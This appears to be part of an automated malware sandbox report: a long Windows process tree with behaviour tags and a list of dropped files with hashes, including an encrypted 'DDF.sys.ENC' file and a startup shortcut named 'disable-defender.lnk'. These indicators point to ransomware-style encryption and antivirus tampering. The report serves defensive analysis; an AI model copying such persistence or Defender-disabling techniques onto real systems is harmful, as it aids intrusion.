                                                                                                    C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                    1⤵
                                                                                                      PID:5728
                                                                                                    • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                      C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                      1⤵
                                                                                                        PID:4984
                                                                                                      • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                        C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                        1⤵
                                                                                                          PID:5080
                                                                                                        • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                          C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                          1⤵
                                                                                                            PID:4640
                                                                                                          • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                            C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                            1⤵
                                                                                                              PID:5168
                                                                                                            • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                              C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                              1⤵
                                                                                                                PID:2572
                                                                                                              • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                                C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                                1⤵
                                                                                                                  PID:5048
                                                                                                                • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                                  C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:4628
                                                                                                                  • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                                    C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:2220
                                                                                                                    • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                                      C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:2480
                                                                                                                      • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                                        C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:1288
                                                                                                                        • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                                          C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:4376
                                                                                                                          • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                                            C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:5404
                                                                                                                            • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                                              C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:2016
                                                                                                                              • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                                                C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:3572
                                                                                                                                • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                                                  C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:5312
                                                                                                                                  • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                                                    C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:232
                                                                                                                                    • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                                                      C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:3240
                                                                                                                                      • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WindowsBackupClient.exe
                                                                                                                                        "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WindowsBackupClient.exe" -ServerName:WindowsBackup.AppX7g7ckthmr138zk16nhs1hb5tyevsa9p6.mca
                                                                                                                                        1⤵
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:3516
                                                                                                                                      • C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                                                                                        C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        PID:1140
                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:5272
                                                                                                                                      • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                                                                        "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
                                                                                                                                        1⤵
                                                                                                                                        • Enumerates connected drives
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Modifies registry class
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:6716
                                                                                                                                        • C:\Windows\SysWOW64\unregmp2.exe
                                                                                                                                          "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
                                                                                                                                          2⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:6756
                                                                                                                                          • C:\Windows\system32\unregmp2.exe
                                                                                                                                            "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
                                                                                                                                            3⤵
                                                                                                                                            • Enumerates connected drives
                                                                                                                                            PID:6800
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 3168
                                                                                                                                          2⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:1960
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
                                                                                                                                        1⤵
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        PID:7128
                                                                                                                                      • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                        C:\Windows\system32\AUDIODG.EXE 0x498 0x460
                                                                                                                                        1⤵
                                                                                                                                          PID:2088
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6716 -ip 6716
                                                                                                                                          1⤵
                                                                                                                                            PID:4672
                                                                                                                                          • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                                                                            "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
                                                                                                                                            1⤵
                                                                                                                                            • Enumerates connected drives
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:4384
                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                            1⤵
                                                                                                                                              PID:412
                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                • Modifies registry class
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:5556
                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1956 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1864 -prefsLen 23761 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf719cb4-c17d-438c-96b9-6a1393bf4449} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" gpu
                                                                                                                                                  3⤵
                                                                                                                                                    PID:396
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2356 -parentBuildID 20240401114208 -prefsHandle 2348 -prefMapHandle 2344 -prefsLen 23639 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e493534c-8324-49b8-9ddd-0716e2d03d6e} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" socket
                                                                                                                                                    3⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    PID:2732
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3040 -childID 1 -isForBrowser -prefsHandle 3044 -prefMapHandle 2968 -prefsLen 22590 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88ee182b-f2e1-4d58-8c9c-49cc9085ea89} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" tab
                                                                                                                                                    3⤵
                                                                                                                                                      PID:6240
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4256 -childID 2 -isForBrowser -prefsHandle 4160 -prefMapHandle 4156 -prefsLen 29013 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cff0ec1e-b676-4c3d-86c3-7a696a4099f9} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" tab
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4768
                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4908 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5004 -prefMapHandle 5000 -prefsLen 32994 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e1f5528-5711-49ea-a011-5dcd959028f8} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" utility
                                                                                                                                                        3⤵
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        PID:6820
                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5232 -childID 3 -isForBrowser -prefsHandle 5288 -prefMapHandle 5300 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6b8f8aa-7f4e-45e2-b6af-47552e72e24a} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" tab
                                                                                                                                                        3⤵
                                                                                                                                                          PID:6804
                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5396 -childID 4 -isForBrowser -prefsHandle 5348 -prefMapHandle 5280 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4501c85e-f5f5-4120-a725-f26a8d60174c} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" tab
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5956
                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5664 -childID 5 -isForBrowser -prefsHandle 5584 -prefMapHandle 5588 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a652184d-3e10-47db-8b4c-1d5c9402f960} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" tab
                                                                                                                                                            3⤵
                                                                                                                                                              PID:568
                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6036 -childID 6 -isForBrowser -prefsHandle 5888 -prefMapHandle 5944 -prefsLen 33232 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ccdc153a-5745-4998-987a-902a9edb6ce7} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" tab
                                                                                                                                                              3⤵
                                                                                                                                                                PID:6024
                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                            "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy
                                                                                                                                                            1⤵
                                                                                                                                                              PID:6056
                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                              C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                              1⤵
                                                                                                                                                                PID:7056
                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                1⤵
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:4704
                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5244
                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                  "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:7020
                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:6064
                                                                                                                                                                    • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                      "LogonUI.exe" /flags:0x4 /state0:0xa3916855 /state1:0x41c64e6d
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:1200

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                      Replay Monitor

                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                      Downloads

                                                                                                                                                                      • C:\DDF.sys.ENC

                                                                                                                                                                        Filesize

                                                                                                                                                                        16B

                                                                                                                                                                        MD5

                                                                                                                                                                        d166607f7f9af04834675c68a0ff81ad

                                                                                                                                                                        SHA1

                                                                                                                                                                        30e902fac905d7e3cf35229ebe1fcd49fd511200

                                                                                                                                                                        SHA256

                                                                                                                                                                        06db08a0c7bb1811ac641249e5fbea38cff13b2a7f807b1f969520c813f0795b

                                                                                                                                                                        SHA512

                                                                                                                                                                        464bcbfcef0678ca550d3268fedba1fb72795969a0887519f994c1e58be8a65037e4f43dadfbed1a3d9618c0d324a047ac6ede1d656e9749738e567ca88b775a

                                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\disable-defender.lnk

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        6bf6915f8dc4e7289f2ecac6cc0b8939

                                                                                                                                                                        SHA1

                                                                                                                                                                        19d09e6e216b4a8e335efcffd5a8883010ed986c

                                                                                                                                                                        SHA256

                                                                                                                                                                        c31d49338f489549551a5ca659c71b9e6fc1e3ea0052c7c2246bfcb9e392869f

                                                                                                                                                                        SHA512

                                                                                                                                                                        8c9be2dc3b11fbb4ed86509201ffaaa888a4087881b1f23abfee6e53409866a8e01c3cd9e0b38b3cdf17ec4b4290a9ad095c569434f5a69a64f805f736982691

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                        MD5

                                                                                                                                                                        d2fb266b97caff2086bf0fa74eddb6b2

                                                                                                                                                                        SHA1

                                                                                                                                                                        2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                                                                                                                                                                        SHA256

                                                                                                                                                                        b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                                                                                                                                                                        SHA512

                                                                                                                                                                        c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                                                                        Filesize

                                                                                                                                                                        4B

                                                                                                                                                                        MD5

                                                                                                                                                                        f49655f856acb8884cc0ace29216f511

                                                                                                                                                                        SHA1

                                                                                                                                                                        cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                                                                                                        SHA256

                                                                                                                                                                        7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                                                                                                                        SHA512

                                                                                                                                                                        599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                                                        Filesize

                                                                                                                                                                        944B

                                                                                                                                                                        MD5

                                                                                                                                                                        6bd369f7c74a28194c991ed1404da30f

                                                                                                                                                                        SHA1

                                                                                                                                                                        0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                                                                                                                                                                        SHA256

                                                                                                                                                                        878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                                                                                                                                                                        SHA512

                                                                                                                                                                        8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                        Filesize

                                                                                                                                                                        3KB

                                                                                                                                                                        MD5

                                                                                                                                                                        3eb3833f769dd890afc295b977eab4b4

                                                                                                                                                                        SHA1

                                                                                                                                                                        e857649b037939602c72ad003e5d3698695f436f

                                                                                                                                                                        SHA256

                                                                                                                                                                        c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

                                                                                                                                                                        SHA512

                                                                                                                                                                        c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        0d57a449c855203411a38d5ae80bc24c

                                                                                                                                                                        SHA1

                                                                                                                                                                        b361032efa556fc4557bbad595ce89c4b0c13dba

                                                                                                                                                                        SHA256

                                                                                                                                                                        bb59bab10e406cd91bdfe4fc0e8ce2817a6ca32fc731ccb3f90b6b79c1a46c21

                                                                                                                                                                        SHA512

                                                                                                                                                                        8d4244dc9c0e9518cd71aacaa54d43c1e2d74519e3e692160b2b040d00aac25c4ba7a5705391e50957d46c8c711dc07604effea3bc06c8956ecf717f61008da3

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        77fe0ce7e1f9c9ec2f198ad2536bf753

                                                                                                                                                                        SHA1

                                                                                                                                                                        2a366472f227a24f3c0fba0af544676ea58438d7

                                                                                                                                                                        SHA256

                                                                                                                                                                        c69ca7653724e1e9e52518de8f4f030813e1431223d5b6ad3270531d8df89f00

                                                                                                                                                                        SHA512

                                                                                                                                                                        e8d4e17b93fb19364eeeffc5b1016fdbe566a8b8d702005291ff263367840b8ccc76290d8a3ad457d40fb5d1c2204bdaa5acba9374236c77935ebb0fe597a095

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                        Filesize

                                                                                                                                                                        48B

                                                                                                                                                                        MD5

                                                                                                                                                                        43da4cf476cac97a1c881cd1009243e6

                                                                                                                                                                        SHA1

                                                                                                                                                                        91d2e53549e69ad7b492b7820343d58253ddce64

                                                                                                                                                                        SHA256

                                                                                                                                                                        1a01cb1f4892d7895588a10673201cbbbee725a8bb61063c8174fbdffd7f71b7

                                                                                                                                                                        SHA512

                                                                                                                                                                        7bcd37f71f7991a38cbb34fb88d17b118756158d4d9d6457cf5bbeebf21c4ffeeacc4cc43340579401002ad1069db45893f45192fc0d3407d96ca9a319c13acc

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                        Filesize

                                                                                                                                                                        144B

                                                                                                                                                                        MD5

                                                                                                                                                                        c991ddb7fc7967a4b7c51917779243ef

                                                                                                                                                                        SHA1

                                                                                                                                                                        e4b3ecff68e971a5e6aa6a9daf27ff2988d23b16

                                                                                                                                                                        SHA256

                                                                                                                                                                        fe43022ed32a261e7a2abc2990d661fb54236bf7d7a47de18c2bd1acebad899e

                                                                                                                                                                        SHA512

                                                                                                                                                                        cfee8384c5d2b0e58be8134762337707ce813cf437f78bcfc1cc5712e771d1f40b8f688f0302fe69dfe257710918057c2c9f3e1a4b8150af65b3b70d4e94a669

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

                                                                                                                                                                        Filesize

                                                                                                                                                                        20KB

                                                                                                                                                                        MD5

                                                                                                                                                                        49693267e0adbcd119f9f5e02adf3a80

                                                                                                                                                                        SHA1

                                                                                                                                                                        3ba3d7f89b8ad195ca82c92737e960e1f2b349df

                                                                                                                                                                        SHA256

                                                                                                                                                                        d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

                                                                                                                                                                        SHA512

                                                                                                                                                                        b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                                                                                                                                                        Filesize

                                                                                                                                                                        70KB

                                                                                                                                                                        MD5

                                                                                                                                                                        e5e3377341056643b0494b6842c0b544

                                                                                                                                                                        SHA1

                                                                                                                                                                        d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                                                                                                                                                        SHA256

                                                                                                                                                                        e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                                                                                                                                                        SHA512

                                                                                                                                                                        83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001

                                                                                                                                                                        Filesize

                                                                                                                                                                        41B

                                                                                                                                                                        MD5

                                                                                                                                                                        5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                        SHA1

                                                                                                                                                                        d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                        SHA256

                                                                                                                                                                        f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                        SHA512

                                                                                                                                                                        de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                        Filesize

                                                                                                                                                                        124KB

                                                                                                                                                                        MD5

                                                                                                                                                                        c192e3f47d604398a6d84215e759a5d0

                                                                                                                                                                        SHA1

                                                                                                                                                                        ecc470d693ec1422b68302b113991fe2a2f5b4d1

                                                                                                                                                                        SHA256

                                                                                                                                                                        a26b1eb0c68bb2ecdb2ed38a98ee08385c8e93570b9e1b6c9ebf705ae4dcb288

                                                                                                                                                                        SHA512

                                                                                                                                                                        6d6beb9df87402c4a1990b947401d2a72c58ceec8cf848079f094e20e4b1a762fb0b70f144d902aeda53e7107d61c5c503b602be30f3c4bc18f8b6b44941bbe6

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                        Filesize

                                                                                                                                                                        399B

                                                                                                                                                                        MD5

                                                                                                                                                                        25825d90d1b9ee75a7d57fe258d4e9ac

                                                                                                                                                                        SHA1

                                                                                                                                                                        049c359c016e3973f9656acfb730afc97b2c8a47

                                                                                                                                                                        SHA256

                                                                                                                                                                        abe59438ea9efc3795399242a90ad5d35b030080e1e0e5fa99cf0ea975608483

                                                                                                                                                                        SHA512

                                                                                                                                                                        7c60456d8960d18cfe0a3e35d9b8a2cf5a7ae6a15081362fc81eef4251cb75240f4496216d9458d07fffbdb4158e939da7a0c6954dc17230a70d496f2e3507d8

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe57f77f.TMP

                                                                                                                                                                        Filesize

                                                                                                                                                                        59B

                                                                                                                                                                        MD5

                                                                                                                                                                        2800881c775077e1c4b6e06bf4676de4

                                                                                                                                                                        SHA1

                                                                                                                                                                        2873631068c8b3b9495638c865915be822442c8b

                                                                                                                                                                        SHA256

                                                                                                                                                                        226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

                                                                                                                                                                        SHA512

                                                                                                                                                                        e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        5KB

                                                                                                                                                                        MD5

                                                                                                                                                                        11097c509df62175ad73881cd4c3900d

                                                                                                                                                                        SHA1

                                                                                                                                                                        511852e49c708b9093dcdef850386f0e15c189aa

                                                                                                                                                                        SHA256

                                                                                                                                                                        710a37e8a44babfabfcf39fecf0fc6ac32f0fb5855be56bcce21cefd4d7111c9

                                                                                                                                                                        SHA512

                                                                                                                                                                        432d50e282059ff8e7a48cda0f0064549e820caf99a21c5d88c23808a28a464047559dc1e9ba6796809251a848b709609a90bc36d72a37013834bb0ae5210a46

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        6KB

                                                                                                                                                                        MD5

                                                                                                                                                                        329cf6d5a07ea3a8eee1334b7eaab687

                                                                                                                                                                        SHA1

                                                                                                                                                                        d6149e121155bae24679a45fc65a8480a0c80517

                                                                                                                                                                        SHA256

                                                                                                                                                                        175c0785d6697e4040a1593ff8427c23b82914479c87088cd932084b79302cef

                                                                                                                                                                        SHA512

                                                                                                                                                                        94689be271f947b582817729bd73033044411fd58140bacfe50564b974f6595b6f40bd61d5a597e25046bce0dfe77b9c561bcb3a796836f9b9913eb78ab3124a

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        5KB

                                                                                                                                                                        MD5

                                                                                                                                                                        c40e8f15cff8e4760fba1f207ae7bd15

                                                                                                                                                                        SHA1

                                                                                                                                                                        0cccadc1a445e494055b946862db06a142725630

                                                                                                                                                                        SHA256

                                                                                                                                                                        61648d1c1bcd2fd1ed63cb224fe123d98416ceb55a38a52eaec7e59ddeef0750

                                                                                                                                                                        SHA512

